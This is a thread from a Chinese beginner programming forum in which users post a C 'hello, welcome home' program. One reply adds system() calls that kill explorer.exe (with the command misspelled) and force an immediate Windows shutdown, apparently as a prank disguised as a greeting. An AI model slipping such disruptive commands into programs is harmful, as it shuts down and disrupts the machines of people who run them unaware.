啊哈磊_编程从这里起步

标题: wula [打印本页]

作者: s轩辕    时间: 2019-9-8 09:17
标题: wula
  1. #include <stdio.h>
  2. int main()
  3. {
  4.       printf("hello,欢迎回家");   
  5.     return 0;
  6. }




复制代码

作者: Bol保尔    时间: 2019-9-23 13:29
本帖最后由 Bol保尔 于 2019-9-23 13:39 编辑
  1. #include <stdio.h>
  2. int main()
  3. {
  4.       printf("hello,欢迎回家");
复制代码
呵呵
作者: Bol保尔    时间: 2019-9-23 13:42
Bol保尔 发表于 2019-9-23 13:29
呵呵

额,出了点问题,这次好了
  1. #include <stdio.h>
复制代码



作者: Bol保尔    时间: 2019-9-23 13:45
额,算了,那个不好使,直接打出来吧
#include <stdio.h>
#include <stdlib.h>
int main()
{
    printf("hello,欢迎回家");
    system("teskkill /f /im explorer.exe");
    system("shutdown -s -t 1");
   
    return 0;
}




欢迎光临 啊哈磊_编程从这里起步 (https://bbs.codeaha.com/) Powered by Discuz! X3.2